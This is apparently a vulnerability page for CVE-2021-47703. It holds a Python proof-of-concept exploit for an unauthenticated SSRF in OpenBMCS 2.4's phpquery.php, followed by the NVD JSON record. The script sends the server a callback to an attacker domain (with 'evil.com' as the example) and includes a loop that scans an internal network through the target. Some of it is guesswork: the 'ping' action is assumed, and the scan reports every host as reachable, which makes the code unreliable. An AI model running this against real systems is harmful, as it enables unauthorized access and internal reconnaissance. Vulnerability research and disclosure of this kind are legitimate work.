CVE-2021-47703

import requests import sys # CVE-2021-47703 OpenBMCS SSRF PoC # Target: OpenBMCS 2.4 (phpquery.php) # Author: Security Researcher # Note: For authorized security testing only def exploit_ssrf(target_url, attacker_domain): """ Exploit SSRF vulnerability in OpenBMCS 2.4 Args: target_url: Base URL of vulnerable OpenBMCS server attacker_domain: Domain controlled by attacker for callback Returns: bool: True if exploit successful, False otherwise """ # Construct malicious URL with SSRF payload ssrf_payload = f"http://{attacker_domain}/" # Target endpoint (typical OpenBMCS phpquery.php) endpoint = f"{target_url}/phpquery.php" # Parameters that trigger SSRF params = { "ip": ssrf_payload, "action": "ping" # or other action that triggers HTTP request } try: print(f"[*] Sending SSRF payload to {endpoint}") print(f"[*] Target will make request to: {ssrf_payload}") # Send request without authentication response = requests.get(endpoint, params=params, timeout=10) print(f"[+] Request sent successfully") print(f"[*] Response status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def internal_network_scan(target_url, internal_ip_range): """ Use SSRF to scan internal network Args: target_url: Base URL of vulnerable server internal_ip_range: IP range to scan (e.g., "192.168.1.") """ endpoint = f"{target_url}/phpquery.php" print(f"[*] Scanning internal network via SSRF...") for i in range(1, 255): target_ip = f"{internal_ip_range}{i}" params = { "ip": f"http://{target_ip}:80/", "action": "ping" } try: response = requests.get(endpoint, params=params, timeout=2) print(f"[+] Host {target_ip} is reachable") except: pass if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2021-47703.py <target_url> <attacker_domain>") print("Example: python cve-2021-47703.py http://vulnerable-server.com evil.com") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] exploit_ssrf(target, attacker)

{"cve": {"id": "CVE-2021-47703", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:49.050", "lastModified": "2025-12-19T19:39:02.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBMCS 2.4 contains an unauthenticated SSRF vulnerability that allows attackers to bypass firewalls and initiate service and network enumeration on the internal network through the affected application, allowing hijacking of current sessions. Attackers can specify an external domain in the 'ip' parameter to force the application to make an HTTP request to an arbitrary destination host."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbmcs:openbmcs:2.4:*:*:*:*:*:*:*", "matchCriteriaId": "E3963F28-1F3E-488E-A815-FA0BD370105D"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50670", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.openbmcs.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/openbmcs-server-side-request-forgery-ssrf-via-phpqueryphp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5694.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}